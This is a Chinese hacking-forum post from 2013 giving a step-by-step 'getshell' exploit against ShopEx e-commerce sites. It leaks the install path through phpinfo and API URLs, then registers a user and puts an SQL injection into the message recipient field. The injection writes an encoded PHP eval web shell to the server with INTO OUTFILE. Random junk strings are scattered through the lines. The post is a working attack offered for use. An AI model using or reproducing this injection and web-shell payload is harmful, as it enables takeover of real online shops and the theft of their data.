找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2328|回复: 0
打印 上一主题 下一主题

shopex前台普通用户getshell最新漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:28:28 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一个:想办法找到目标网站的绝对路径
1 L9 U: E! }' F0 N" C6 b+ d( I. R3 Q3 M6 j
http://www.political-security.com/install/svinfo.php?phpinfo=true
8 x/ e% `4 t+ T, ?5 ~/ r( b% R; K* d& j6 X! q$ Y2 R
http:/www.political-security.com/core/api/shop_api.php
, h/ c, ?; k3 K( K" v" k- q
# C7 W8 W8 h2 w- h7 r7 jhttp://www.political-security.co ... api_b2b_2_0_cat.php
$ j  V3 w) ^$ D8 I6 D: Y) |2 W  c" F3 A# c7 x
http://www.political-security.com/core/ap ... b_2_0_goodstype.php3 i( k8 G7 L2 \- D. Z$ S+ ]
) O. L+ y( M* F1 Q
http://www.political-security.co ... i_b2b_2_0_brand.php2 L9 ]6 ?; h  f( h
第二个:注册一个普通用户" ^# P* P$ V. Q! U) m
! S9 D2 |, [. S+ B
http://www.political-security.com/?passport-signup.html
6 f+ p# u9 O# U' Z! Z  q$ S/ ^1 @7 ]1 d# @% Y
第三个: 发送消息 + }. M1 B% S" z& p+ X4 P

. g  h1 F. _7 ]' L5 `http://www.political-security.com/?member-send.html+ {. Z0 w. i4 o0 Z+ D; a
发送给中填写
, O- S9 G2 P+ D& Y8 N' Rantian365.com' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表